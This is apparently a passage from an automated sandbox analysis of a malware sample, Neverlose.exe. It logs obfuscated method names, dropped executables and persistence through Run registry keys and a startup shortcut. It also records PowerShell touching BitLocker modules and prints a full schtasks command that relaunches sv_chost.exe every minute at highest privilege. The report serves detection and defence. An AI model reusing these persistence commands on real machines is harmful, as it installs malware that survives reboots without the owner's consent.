                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, E8phRKCKw5AfpQsOlZWL2sYGK.csHigh entropy of concatenated method names: 'woNNvbBHYYayGYkYBOl894t8i', '_3s5PwmBfKfiBCNOBQXr0grICf4uPFzQHgqdzkNyJBjrIBUyGowcEc52SRFc2zzv4zcjKlakgQDICleDyrlrOhYZs0Jdi4', 'LSyWMQAAazaffZiZKajqA1c9rwn5yD9bDrDB8PR1H2yF5HG4F19i1ZNieIEf90ddo6SEUBQAwvknoODglzpPnX6Z9SSES', 'F3aZ3ypQuDq48GzTIxVHe8vxnCLJ8vBqTPQDQygY1wjSeZlTLh3Oh9qS6YwnliV08FqlfIXvcpqXSrV1npLppBO7g4X2x', '_0WmFIssJVQqfaVIKIPw5SIJKWfhVdrSCNmeCyu7PcrBNHimyjP0ENQZyqeXcn7tgmq2RD0QZOmYwdmyCYH7eKMOV5ILUg'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, 0RhgANw5PGWmGKZ15e5NJiNQS.csHigh entropy of concatenated method names: 'rYVj5gN0TIrof0Ma56WAroWQX', '_3pY46X5nz8CyVBKd1fbfZimFh', 'B2sZNRjBHELj1BmXrJVBlwNh7', 'qJ5EUBuUhc6rQE3MB3cSPjITV', '_8YmVh1FhqE6WBC39aVR1v8sUmJmjJ3oR5kLT3uoZFvTCxKVOX3S4L6rw8iGqkMrheFxdYCWh8SC4Ri8qgV2NlkrWTWHmY', 'WJ9Ilb8WZtm4dcpxmii76VNMgm0VSFxEfym5TAyNrulmyZGN6UHNN5tdhhVJPj0KY53lSQBTzlJEQgCrAeXxXR0sD8tvI', 'bPY3VKC7hCUncfFuSChDTAo6zUo7JtfRfk5JUmQEJYxLSHU0HdS3MDBy6oOXGdIb6mLW47lYGYBlutT24KGw3pgrTe5V8', 'bUzlZdvTPOO0W5unfSl8GVKgBoAl9e6vBv0j57lKM4Hy84L9Am5u1ovnbJrhzZJHffqeikF1JOD00uCYZUr0CRKRrT3Hs', 'syRWe5KmsTdoPh058MzXXhs8Q2bSKwiAjaibQmmTaqM4CvqiOx2ZSJwmU55NyeFrXBprlOwsmsErXlfabM43VtzPOcogG', 'E7PHFRwMBYzt2AJjaqXkACO1EaoJ5H15wT25EfsEZawy84TyYDjrvHPvR3Uj6DKCcFwA4fEp1g0K4hpznNlKtUGIqOegp'
                  Source: sv_chost.exe.4.dr, WUHrLuAzG76gjb420QL2petRr.csHigh entropy of concatenated method names: 'OowvofSDDc4ET7y3kHStsFVYQ', 'wUT7yhbH8yrBs28ptpZ7paLIi', 'cPuCSHrIUyinXAQpEZE4qi2uf', 'wK6BrlTVvp0PIWOzWT7N6I5TtuMEcl8kh1S', 'XWB6EcNQHnQNbT6OCzzqiip7Z8eX9YYcxFD', 'f6SWfPTavhpioocdQbXsEVHxfgQYt0NEdjz', 'IQI51zSt6w3RX352czL0GqqRyiaZ9beRTLi', '_3FSsJ68XU4xFa7TqCN2LmOvwIIiRusfNaOS', 'QqejOadNHaBM70sYr2ndJwSFJGC1Z7a4dQT', 'oqq09uWShpD1v0on0o646ceHuX2dnyKbdUZ'
                  Source: sv_chost.exe.4.dr, FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.csHigh entropy of concatenated method names: 'LBGv7RRFPn4976IF9aRFE4vMEUNxsaQ0bX1DWEDJaOUZKCUQuWk1RO2ylGq3', 'udpRpvGmAz57Y2O8rM75yPIs91RxBCk8Xb9GN7Bckx9ELsEaHfKb3FLeNqp7', 'xMaI0a85HjyijYhMhP0ctM9y6tQCq4UIJ6di5ajAt5xvLPbPAQwvBotBhSop', 'xOJfSVuUewM3wv7I67tAmY6qiJFhyVFqymavk4CN7cADRf5ACje5q4FkW0pM'
                  Source: sv_chost.exe.4.dr, YkmDGDOksHr5qrnsfF4B2F4yTHPN8Jh3v2Y5xPFK1ucmal0ibb0PwQ2xw1gyde4c6.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'kEIRhyaOG6W7qjuLq4LO1JMrwQMvzpv7aBvNkd2N7gYLrFxgYV4vfwY0DOCeqwXfuqAuMzOeDGC', 'QENxfIInhQRjLWxrm4RQ6lFWuMNo006mvnz2mewQA1IgthDBYwBqq9YW2tSMJ8L7haMhmVC0L5h', 'Q8M1YYpFKjomgnimRPqiovTyJncNoDj8xmyzwwel1aPdHCj98KvrRLayALB0', '_7r3jC0HfqMCJNMMkhzZTNQVzUYF77xCqgzGXb6oSvai9OMItNLBCLe5pW7kN'
                  Source: sv_chost.exe.4.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.csHigh entropy of concatenated method names: '_3WkO9CHX5n3O0pGvwGK2GYYE1', 'MhM84cAcUC1tmKCDH3sJ7JSLJ', 'fJQ171sCTcNYAMsRUZImHvsJb', 'UlSZPzIGapH4OdhfOJKxnUCM0', 'C3ZtU5gOVvNrDnOJ4QThnfs74', 'Z7l08qNJCG6GApOyUfYdmhVki', '_0992M3o93AjFJXrFDl7bMy5rd', 'P0o9Na9XjNXWqALcTFWJeAG1V', 'fY5sVZgSamt9kyYZnDwtu45CZ', 'VvWC8Ut8u54FUjU7sAphOV0QN'
                  Source: sv_chost.exe.4.dr, Wj3PjIfqD1OSSp0iwZycbM1aD.csHigh entropy of concatenated method names: 'RXrXjEiYvFSIlBcduEeeE8lH9', 'PAxhwEy1krySFSbJSOQcG3gSJ', 'h98aL2t7wod8gzaBng9cdkgtH', '_9U2gA8lwegLGMUrP7KqCkKV8c', 'm4R9ZM4JZ4viyR28mfUhQU3fP', 'A8TvHfc9O4NDr5h6uXJJKzIcY', 'nHGP2MMab7ieetFHPOCzaS0lh', 'JdBvwjbLekFt843r0HegBknfw', 'mbqZYrm30q4fPFbOLgm25u4QJ', 'Q5OEHHUrArBRxsi9WguVtcyVW'
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.csHigh entropy of concatenated method names: 'GxO3TdFlvoojPQarF5sHZUWQYcUQdoqTpgV2TADkl0NcyK2z7GmcJ1EGd2nRNhSmmoadBkC9YhNvhAemX9Ndm5U88NtOFEwITP', '_8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu', 'gSvqT2UygyJ8SEjhMz7WS7m4GviFjA1XZYwOVOHhvBzrbxP7uVxVztEo7dBbVRiXjBb14k7OcyjNH3V1GWNZoyFALczGvFNfWh', 'lygg1I8X9Vr3DNzZlHUWuu4Y6PRhc9lVV7knYyo2zmgOU4xvgj9MJceVz6xWblv3I4g5EbMYpmEsQofqmkXunWyryhatai6Fdv', 'YCoF4EvPrPjHQZ0HflYeaTjEsgqlACwC0h38tj5QaCfIhEklMWUvJq0IS5nOUnscQc0fKGXHPoc8h1DBGRTiTECaza65ubAEDJ', 'wRC9iO4UNSzzIHVnbM5hHNX6arORUdzwaxfB0tvq68IBKllpxL0xh5L0bnmMmbjrgXbl8gDAJwtE5GbFyFqbN0FPO375CsO4EM', 'qG32MDQ12K0GRA77JkqYtxX7Wf6hJdixIDbhktqaarUafj0WT04RKQX5XPRiRXtWFcktaSI0QJGQ322mYhJkaLC1eMgyMk5jHM', 'dPRlkea35Qb0tgllFMwACj1BznSFtzDtR56UqoK9JDthAljsFZnwkO79aDMsHR69xEGY6XKNJgXE08sC7SoWgn2zgNzVgwRTh9', 'Vbpv1QaisRwG8kMSJBQbtGSKL9CgA2BqkRlIts0WrpIHBAqa0w9zke4GGpMuPwYlS3JcO39JftJABy29gXidcex6SlO5ShynID', 'natV2pBRfwSVKnZRVRxJPMfLHM539iW0KWweYNUAmjvkmFDnnT6vX7QqdIM6rVTaHDMpeksTKcfDkfBUvxPqozyxdZIATHo0es'
                  Source: sv_chost.exe.4.dr, P2XOur6bqoe5LxNtDHyiL3aGh.csHigh entropy of concatenated method names: 'aJJJWPOIkTbTkss4Igvj4IkdB', 'R3CY8bj7ZA7ssA0a57qXXqY2zaw4WTCya0YoxYCbdT61szRxWvcYxbbIwW94', 'bqodObM0EtWvsA8UOldQGkJQG81RBNBuXPmGbHCcrEiiNGgTwugTyAVpgTlu', 'mMZZ9OHwXusb2dKkVAQ1jgP0av6JAL2tHls9WWek56WkeUmnDGvug2kQ0uTY', 'L93aRCzIAJy7U8XuS69Rgkgz9zS99KEIiCwZxFUvfymVhwdXkjpwYPeRs0cZ'
                  Source: sv_chost.exe.4.dr, 9anJqYyVCjcrXTuH1GzopYW8wzyY78Cd40FBQZs2D00E8Ibmuz0NNIGaS8nPFW6rEQFzkcsRuNbLEld04TJOzbVcsq03WRbNSG.csHigh entropy of concatenated method names: 'vhyLcb9WwRxTlJ28NuxeWPj0eoKj5cZufOpv2fBjWc44RyALE2I2OQdqaJYlhndX0LbEnkiruOJ2bQvqLyr3ruQEqUvD0c6m7C', 't02xA0JZht1N9iOyAPNGa0fXGh1ru1pr2VC7SlnQtH3f9wDeVo3meILYSyQBPUe3iI4owHK3dhSfPqdqN37iNWZMJ72HGsWfXv', 'c0LqPsDD9vpIvPboJ2p5Vh8iro038VLiShiPHknWmWUdf281xfhpF5O0R1rdB1a3WUgZlStGKEdW9y1dm7erjqRg6Vdm1uXAOO', 'JUqhuH2arwD8n31kiAbg25H76i8zc3Hvg2zJKbIzkdGWcLQJDPsvan1fbFnNj62ZfHJHWKwJB1UJ8nuH6o6aSkuIFkhi3rfLVb', '_45Z3UpAryp7dJR4jHvUasCrIXOby7BdcytU33dsicQQGZkPrxbPW5hxjl4CeJfPOKh9fd8YU5zwfIRsrQEdE0zFUz5ETKJB8BW', 'uGYoX3KpGSaukuhq6MExbq3sp3emPKwCGpsHl8eT1Rjnn3jfdDFnx7fVXR7w', 'v6aaD0eafsx1Lm9zTRXenuXlPSOHP0BbmYHbUtxy1n8cs92X0VMVZ1CGgbft', 'BBMDmVpkEAPx6KlniT6v1pY597rRrIgbFPQ5DabpusmxSfzNuDhrCru5hViv', 'ozDyrJ7c8KthqWAA2IjogXVpWuVYBITckeTOIGZ25Je38Wvi28wQsSR04zZz', 'YsSKpaSercYU0RD2KNsU9fN7DsqpnqImXkxiT6K21QVFBaNcCft5zM5qKTta'
                  Source: sv_chost.exe.4.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csHigh entropy of concatenated method names: 'PAzJ2Vuz2610vI1WuG7NojUv2f66IGmfr3y7CIyzNVWTOmPLeJ0i1ZVt373gl2wjwTxjgFJRBRazzKwe7lJXrgu2hVeXBxtHhg', 'hIVubgYXHBzKvBDW0ilVwVIt1Vvs0H2aeGoqzLiMzjW5neC3LgPbhLVA76XswcKn7mJLmiAEXvIokptm0Ek9Ufiq9WzUtxGFaU', 'hAe4tkQP421eNr7Zc4MeougE41ZHAsl1ljhPHDgAIocDCXl7fF6GE3vOH12dOwlsJ9qhNeACsGU8qgAjfZjpfFeTltZmprhlHk', 'Bf8uaoyAmqUuabzA1M9c19yH1J2QckpWPPZ3MrTre2cHTMS1q73va5tmvsBLDZfzOmDYx8xxcndB3tbuzRtKUmVUiD1F1gQI7C', 'VwkVlWGISswZyeOkrSiHbu9jO17cxX9l3shzwvLRAHAzrqhKrB3Y8smKrcGyS4OeR0jHaUGOIwVp8GGlMWTxvqPckiEPj4MTDJ', '_7EG628END1shnUJVHgqToJjFeefrJgkPKk3lcLTZ8viUSYF8f5eFRwC70J8i9C50by3SmQonZLbNaWDPu21o8eVV829cgeoZvh', 'DAPRzYyW2xpLAKpXBLhoVztCUq7U0k4YkvkQzm5jumXywN8ckqgVsNoH8eN98JHCQNcIE67Bprcd0v3lhyd1B4hypI8gZ40nPg', 'GtofFdJ4qCtavXAGBjCunL2YwMO3rMk8OpyqgJJO8BRwD9hLP5nkWO3TkBcpSSp0oKRH4HAY5wJF04QOylCX26oqBm9Z9qfAuQ', 'QaWNagj6M4ABQakOS6OTPHDPDHY4cmTHkTTUsuzR00UI8ZN7q6d6UOgSbaBPordllN3DEMmSOtXXTnWOpE1ixPril51cpmyfGe', 'Y7slcQu3AJ0VF6BzAsMpAMAhDbYkKbt2eSIANY2JBkcGEMtNFPmmlTfBetZ0E919JifefOp9Rq06xhPqH225keFAlsVMrfDijg'
                  Source: sv_chost.exe.4.dr, E8phRKCKw5AfpQsOlZWL2sYGK.csHigh entropy of concatenated method names: 'woNNvbBHYYayGYkYBOl894t8i', '_3s5PwmBfKfiBCNOBQXr0grICf4uPFzQHgqdzkNyJBjrIBUyGowcEc52SRFc2zzv4zcjKlakgQDICleDyrlrOhYZs0Jdi4', 'LSyWMQAAazaffZiZKajqA1c9rwn5yD9bDrDB8PR1H2yF5HG4F19i1ZNieIEf90ddo6SEUBQAwvknoODglzpPnX6Z9SSES', 'F3aZ3ypQuDq48GzTIxVHe8vxnCLJ8vBqTPQDQygY1wjSeZlTLh3Oh9qS6YwnliV08FqlfIXvcpqXSrV1npLppBO7g4X2x', '_0WmFIssJVQqfaVIKIPw5SIJKWfhVdrSCNmeCyu7PcrBNHimyjP0ENQZyqeXcn7tgmq2RD0QZOmYwdmyCYH7eKMOV5ILUg'
                  Source: sv_chost.exe.4.dr, 0RhgANw5PGWmGKZ15e5NJiNQS.csHigh entropy of concatenated method names: 'rYVj5gN0TIrof0Ma56WAroWQX', '_3pY46X5nz8CyVBKd1fbfZimFh', 'B2sZNRjBHELj1BmXrJVBlwNh7', 'qJ5EUBuUhc6rQE3MB3cSPjITV', '_8YmVh1FhqE6WBC39aVR1v8sUmJmjJ3oR5kLT3uoZFvTCxKVOX3S4L6rw8iGqkMrheFxdYCWh8SC4Ri8qgV2NlkrWTWHmY', 'WJ9Ilb8WZtm4dcpxmii76VNMgm0VSFxEfym5TAyNrulmyZGN6UHNN5tdhhVJPj0KY53lSQBTzlJEQgCrAeXxXR0sD8tvI', 'bPY3VKC7hCUncfFuSChDTAo6zUo7JtfRfk5JUmQEJYxLSHU0HdS3MDBy6oOXGdIb6mLW47lYGYBlutT24KGw3pgrTe5V8', 'bUzlZdvTPOO0W5unfSl8GVKgBoAl9e6vBv0j57lKM4Hy84L9Am5u1ovnbJrhzZJHffqeikF1JOD00uCYZUr0CRKRrT3Hs', 'syRWe5KmsTdoPh058MzXXhs8Q2bSKwiAjaibQmmTaqM4CvqiOx2ZSJwmU55NyeFrXBprlOwsmsErXlfabM43VtzPOcogG', 'E7PHFRwMBYzt2AJjaqXkACO1EaoJ5H15wT25EfsEZawy84TyYDjrvHPvR3Uj6DKCcFwA4fEp1g0K4hpznNlKtUGIqOegp'
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile created: C:\Users\user\AppData\Roaming\sv_chost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Neverlose.exeFile created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Neverlose.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.exeJump to dropped file

                  Boot Survival

                  barindex
                  Creates multiple autostart registry keys
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sv_chostJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SolaraJump to behavior
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sv_chost.lnkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sv_chost.lnkJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SolaraJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SolaraJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sv_chostJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sv_chostJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
